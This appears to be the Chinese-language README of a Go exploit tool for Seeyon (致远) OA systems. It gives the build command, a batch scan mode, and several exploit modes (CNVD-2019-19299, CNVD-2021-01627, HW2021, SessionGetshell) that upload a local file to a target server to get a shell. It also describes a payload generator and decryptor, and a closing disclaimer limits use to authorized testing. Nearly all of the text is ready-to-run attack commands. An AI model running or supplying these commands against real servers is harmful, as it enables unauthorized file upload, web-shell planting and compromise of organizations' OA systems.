基于go语言的致远OA漏洞检测工具
go build -o SeeyonExploit main.go
./SeeyonExploit VulScan -u http://xxx.xxx.xxx.xxx
./SeeyonExploit VulScan -f url.txt
url.txt中每行一个扫描目标
http://test.com
http://test2.com
./SeeyonExploit CNVD201919299 -u http://xxx.xxx.xxx.xxx -f 本地文件 -n 服务端生成的文件名
./SeeyonExploit CNVD202101627 -u http://xxx.xxx.xxx.xxx -f 本地文件 -n 服务端生成的文件名
./SeeyonExploit HW2021 -u http://xxx.xxx.xxx.xxx -f 本地文件 -n 服务端生成的文件名
./SeeyonExploit SessionGetshell -u http://xxx.xxx.xxx.xxx -f 本地文件 -n 服务端生成的文件名
该工具可以生成CNVD202101627以及HW2021漏洞的payload或者解密payload
生成payload:
./SeeyonExploit DecAndGen -f 本地文件 -n 服务器端生成的文件名
还可以使用-o 文件名,将生成的payload输出到文件中
解密payload:
./SeeyonExploit DecAndGen -s 待解密的payload字符串或payload文件
同样可以使用-o 文件名,将生成的payload输出到文件中。-s后面可以接待解密的字符串,也可以接待解密字符串文件的文件名
本工具仅面向合法授权的企业安全建设行为,如您需要测试本工具的可用性,请自行搭建靶机环境。 如您在使用本工具的过程中存在任何非法行为,您需自行承担相应后果。